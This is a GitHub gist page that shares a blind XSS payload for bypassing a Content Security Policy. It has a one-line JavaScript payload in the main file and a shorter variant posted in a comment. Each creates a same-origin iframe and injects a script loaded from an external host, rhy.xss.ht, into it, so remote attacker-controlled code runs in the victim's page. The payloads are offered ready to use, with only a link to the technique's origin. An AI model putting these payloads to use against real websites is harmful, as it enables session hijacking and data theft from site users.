Skip to content

Instantly share code, notes, and snippets.

@Rhynorater

Rhynorater/gist:311cf3981fda8303d65c27316e69209f

Last active January 3, 2024 07:00
Show Gist options
  • Star 19 You must be signed in to star a gist
  • Fork 7 You must be signed in to fork a gist
  • Save Rhynorater/311cf3981fda8303d65c27316e69209f to your computer and use it in GitHub Desktop.
Save Rhynorater/311cf3981fda8303d65c27316e69209f to your computer and use it in GitHub Desktop.
Download ZIP
BXSS - CSP Bypass with Inline and Eval
Raw
gistfile1.txt
d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://rhy.xss.ht";setTimeout(function(){f.contentWindow.document.head.append(s);},1000)
@Rhynorater
Copy link
Author

Based on: https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa

@Bo0oM
Copy link

Bo0oM commented Sep 3, 2018

d=document;f=d.createElement("iframe");f.src="/robots.txt";f.onload=_=>f.contentWindow.document.head.append(s);d.body.append(f);s=d.createElement("script");s.src="//rhy.xss.ht"; :)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment